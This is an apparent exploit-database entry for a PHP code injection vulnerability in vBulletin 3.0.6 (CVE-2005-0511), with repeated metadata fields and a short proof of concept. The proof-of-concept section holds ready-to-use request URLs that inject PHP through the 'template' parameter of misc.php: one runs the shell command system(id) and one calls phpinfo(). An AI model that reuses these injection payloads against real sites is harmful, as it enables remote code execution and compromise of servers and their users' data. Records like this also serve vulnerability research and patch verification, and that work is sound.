vBulletin 3.0.6 - PHP Code Injection
| EKU-ID: 8966 | CVE: OSVDB-14047;CVE-2005-0511 | OSVDB-ID: |
| Author: pokley | Published: 2005-02-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 8966 | CVE: OSVDB-14047;CVE-2005-0511 | OSVDB-ID: |
| Author: pokley | Published: 2005-02-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
# milw0rm.com [2005-02-22]